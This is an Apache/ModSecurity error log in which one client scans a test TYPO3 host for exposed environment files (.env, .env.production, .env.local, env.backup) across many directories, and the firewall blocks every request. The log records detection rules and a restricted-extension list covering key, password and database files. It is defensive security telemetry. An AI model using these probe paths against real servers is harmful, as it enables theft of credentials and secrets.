[Sat Mar 21 04:10:37.269786 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env"] [unique_id "ab4MLRsiL8ED2XitCKA8gQAAAAI"]
[Sat Mar 21 04:10:37.563709 2026] [authz_core:error] [pid 2836925] [client 13.54.173.38:52002] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env~
[Sat Mar 21 04:10:37.858211 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.local"] [unique_id "ab4MLRsiL8ED2XitCKA8gwAAAAI"]
[Sat Mar 21 04:10:37.858403 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.local"] [unique_id "ab4MLRsiL8ED2XitCKA8gwAAAAI"]
[Sat Mar 21 04:10:37.858542 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.local"] [unique_id "ab4MLRsiL8ED2XitCKA8gwAAAAI"]
[Sat Mar 21 04:10:38.155267 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env"] [unique_id "ab4MLhsiL8ED2XitCKA8hAAAAAI"]
[Sat Mar 21 04:10:38.155431 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env"] [unique_id "ab4MLhsiL8ED2XitCKA8hAAAAAI"]
[Sat Mar 21 04:10:38.155606 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env"] [unique_id "ab4MLhsiL8ED2XitCKA8hAAAAAI"]
[Sat Mar 21 04:10:38.759388 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "ab4MLhsiL8ED2XitCKA8hgAAAAI"]
[Sat Mar 21 04:10:38.759615 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "ab4MLhsiL8ED2XitCKA8hgAAAAI"]
[Sat Mar 21 04:10:38.759788 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "ab4MLhsiL8ED2XitCKA8hgAAAAI"]
[Sat Mar 21 04:10:39.645417 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /usr/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/.env"] [unique_id "ab4MLycEfGZAHyIZnYBwGQAAAAQ"]
[Sat Mar 21 04:10:39.645578 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/.env"] [unique_id "ab4MLycEfGZAHyIZnYBwGQAAAAQ"]
[Sat Mar 21 04:10:39.645713 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/usr/.env"] [unique_id "ab4MLycEfGZAHyIZnYBwGQAAAAQ"]
[Sat Mar 21 04:10:39.940667 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.production"] [unique_id "ab4MLycEfGZAHyIZnYBwGgAAAAQ"]
[Sat Mar 21 04:10:39.940821 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.production"] [unique_id "ab4MLycEfGZAHyIZnYBwGgAAAAQ"]
[Sat Mar 21 04:10:39.940997 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.production"] [unique_id "ab4MLycEfGZAHyIZnYBwGgAAAAQ"]
[Sat Mar 21 04:10:40.235399 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "ab4MMCcEfGZAHyIZnYBwGwAAAAQ"]
[Sat Mar 21 04:10:40.235561 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "ab4MMCcEfGZAHyIZnYBwGwAAAAQ"]
[Sat Mar 21 04:10:40.235751 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "ab4MMCcEfGZAHyIZnYBwGwAAAAQ"]
[Sat Mar 21 04:10:40.530058 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.staging"] [unique_id "ab4MMCcEfGZAHyIZnYBwHAAAAAQ"]
[Sat Mar 21 04:10:40.530217 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.staging"] [unique_id "ab4MMCcEfGZAHyIZnYBwHAAAAAQ"]
[Sat Mar 21 04:10:40.530450 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.staging"] [unique_id "ab4MMCcEfGZAHyIZnYBwHAAAAAQ"]
[Sat Mar 21 04:10:40.825515 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.local"] [unique_id "ab4MMCcEfGZAHyIZnYBwHQAAAAQ"]
[Sat Mar 21 04:10:40.825684 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.local"] [unique_id "ab4MMCcEfGZAHyIZnYBwHQAAAAQ"]
[Sat Mar 21 04:10:40.825853 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.local"] [unique_id "ab4MMCcEfGZAHyIZnYBwHQAAAAQ"]
[Sat Mar 21 04:10:41.120542 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.local"] [unique_id "ab4MMScEfGZAHyIZnYBwHgAAAAQ"]
[Sat Mar 21 04:10:41.120774 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.local"] [unique_id "ab4MMScEfGZAHyIZnYBwHgAAAAQ"]
[Sat Mar 21 04:10:41.120988 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.local"] [unique_id "ab4MMScEfGZAHyIZnYBwHgAAAAQ"]
[Sat Mar 21 04:10:41.415688 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nodeapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeapi/.env"] [unique_id "ab4MMScEfGZAHyIZnYBwHwAAAAQ"]
[Sat Mar 21 04:10:41.415922 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeapi/.env"] [unique_id "ab4MMScEfGZAHyIZnYBwHwAAAAQ"]
[Sat Mar 21 04:10:41.416114 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeapi/.env"] [unique_id "ab4MMScEfGZAHyIZnYBwHwAAAAQ"]
[Sat Mar 21 04:10:41.710588 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.staging"] [unique_id "ab4MMScEfGZAHyIZnYBwIAAAAAQ"]
[Sat Mar 21 04:10:41.710764 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.staging"] [unique_id "ab4MMScEfGZAHyIZnYBwIAAAAAQ"]
[Sat Mar 21 04:10:41.710916 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.staging"] [unique_id "ab4MMScEfGZAHyIZnYBwIAAAAAQ"]
[Sat Mar 21 04:10:42.005484 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.production"] [unique_id "ab4MMicEfGZAHyIZnYBwIQAAAAQ"]
[Sat Mar 21 04:10:42.005676 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.production"] [unique_id "ab4MMicEfGZAHyIZnYBwIQAAAAQ"]
[Sat Mar 21 04:10:42.006190 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.production"] [unique_id "ab4MMicEfGZAHyIZnYBwIQAAAAQ"]
[Sat Mar 21 04:10:42.300645 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.local"] [unique_id "ab4MMicEfGZAHyIZnYBwIgAAAAQ"]
[Sat Mar 21 04:10:42.300824 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.local"] [unique_id "ab4MMicEfGZAHyIZnYBwIgAAAAQ"]
